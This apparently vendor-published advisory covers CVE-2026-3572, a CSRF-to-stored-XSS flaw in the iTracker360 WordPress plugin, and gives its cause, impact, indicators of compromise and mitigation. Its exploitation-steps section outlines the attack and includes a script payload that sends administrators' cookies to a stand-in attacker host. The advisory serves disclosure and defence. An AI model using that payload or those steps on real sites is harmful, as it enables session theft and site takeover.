CVE-2026-3572: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-3572 is a Cross-Site Request Forgery (CSRF) leading to Stored Cross-Site Scripting (XSS) vulnerability in the iTracker360 plugin for WordPress. It affects all versions of the plugin up to and including 2.2.0. The vulnerability was published on March 21, 2026, and was assigned by Wordfence. It carries a CVSS v3.1 base score of 6.1 (Medium) (Wordfence, EUVD).

Technical details

The root cause is twofold: missing nonce verification on the plugin's settings form submission (CWE-352: CSRF) combined with insufficient input sanitization and missing output escaping (CWE-79: Stored XSS). An unauthenticated attacker can craft a malicious HTTP request targeting the settings form handler — specifically around lines 115–116 and 187 of itracker360.php — and trick an authenticated administrator into submitting it (e.g., by clicking a crafted link). Because no nonce is validated, the forged request is accepted, and the unsanitized input is stored and later rendered without escaping, resulting in persistent script execution in the victim's browser (Wordfence, WordPress Trac).

Impact

Successful exploitation allows an attacker to persistently inject arbitrary JavaScript into WordPress admin pages, which executes in the context of any administrator or user who views the affected page. This can lead to session token theft, credential harvesting, unauthorized administrative actions (such as creating rogue admin accounts), and potential full site compromise. Confidentiality and integrity are both impacted at a low-to-moderate level, while availability is not directly affected (Wordfence).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-3572 as of the available data. The EPSS score is approximately 0.078%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires social engineering to trick an administrator into clicking a malicious link, which raises the bar compared to fully unauthenticated attacks (Wordfence).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the iTracker360 plugin version ≤ 2.2.0 using tools like WPScan or by inspecting publicly accessible plugin metadata.
  2. Craft malicious request: Construct a forged HTML form or URL that submits a POST request to the iTracker360 settings endpoint (targeting the handler around itracker360.php lines 115–116/187) with a malicious JavaScript payload in a settings field (e.g., <script>document.location='https://attacker.com/?c='+document.cookie</script>).
  3. Deliver the payload: Send the crafted link or embed the auto-submitting form in an email, forum post, or web page, and trick a logged-in WordPress administrator into clicking it.
  4. Payload stored: Because no nonce is validated, the server accepts the forged request and stores the malicious script in the plugin's settings.
  5. Trigger execution: When any administrator visits the affected settings page, the stored XSS payload executes in their browser, enabling session hijacking, credential theft, or further administrative actions on behalf of the attacker (Wordfence, WordPress Trac).

Indicators of compromise

  • Logs: WordPress access logs showing unexpected POST requests to the iTracker360 settings endpoint from unusual IP addresses or referrers, particularly without a valid nonce parameter.
  • File System: Unexpected or modified entries in the WordPress database (wp_options table) containing JavaScript tags or encoded script content associated with iTracker360 plugin settings.
  • Network: Outbound connections from the WordPress server or administrator browsers to unknown external domains shortly after an admin visits the settings page (indicative of XSS payload execution).
  • Browser/Application: Unexpected redirects or pop-ups when administrators access the iTracker360 settings page in the WordPress dashboard.

Mitigation and workarounds

Users should update the iTracker360 plugin to a version beyond 2.2.0 that includes nonce verification and proper input sanitization/output escaping. If no patched version is yet available, the recommended workaround is to deactivate and remove the plugin until a fix is released. Site administrators should also review their WordPress plugin settings for any unexpected or malicious stored values and audit recent admin activity logs (Wordfence).

Community reactions

The vulnerability was disclosed by Wordfence, a leading WordPress security firm, as part of their standard threat intelligence reporting. No notable independent researcher commentary, significant social media discussion, or major media coverage has been identified for this CVE beyond standard aggregator listings (Wordfence).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management